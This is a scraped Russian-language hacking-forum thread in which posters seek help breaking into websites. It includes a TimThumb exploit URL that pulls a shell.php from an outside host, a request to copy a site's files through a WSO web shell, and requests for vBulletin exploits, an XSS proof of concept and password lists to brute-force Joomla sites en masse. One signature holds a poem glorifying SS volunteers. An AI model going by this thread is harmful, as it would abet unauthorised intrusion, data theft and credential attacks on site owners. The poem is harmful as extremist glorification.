ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть

Есть сайт на Drupal, с него недавно были удалены страницы(ранее существовали, теперь 404). Возможно ли создать(воссоздать) страницы с этими определенными именами? Скажем site/node/12345 - движек, я так понял, создает со случайным номером, а нужно именно с определенным!

Вопрос - чем удобнее всего рипать сайт?

Нужна некая программа, которая используя веб-шелл пройдется по указанным каталогам и сохранит файлы.

Ибо права на чтение есть, хочу сохранить для анализа на случай закрытия уязвимостей.

zipнуть и скачать не получается - объемы адские и не дает - "Internal Error", даже если по 1 каталогу выбирать. (Использую WSO)

Судя по всему стоит ограничение на время выполнения и ничего тут не сделать.

Плюс из всех команд на запуск доступно только proc_open

Подскажите, есть что под vBulletin 3.6.8

Спасибо

xss было

А можно PoC?)

Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"

Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)

какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

Возможно. Может я ошибаюсь. Повторюсь: "я пока что в изучении."

1. Софт для брута (именно Joomla) есть. Авторский. В паблике старые версии.

2. К нему прилагается небольшая база паролей (обычный .txt) пароли типа "admin, 12345" и т.д

Так вот той базе паролей для подбора, доверия нет (всего 70кб)

Пробиваемость с неё на уровне 1-max3% от общего кол-ва сайтов.

Собственно первоначальная просьба была направить меня в нужное русло поиска, или Лучше дать базу паролей для брута (пробиваемостью хотя бы 40-60%) Был бы очень благодарен!

Сейчас ориентироваться в обиллии разных баз для брута очень сложно. Их много, а я один ) Все проверить я физически не смогу.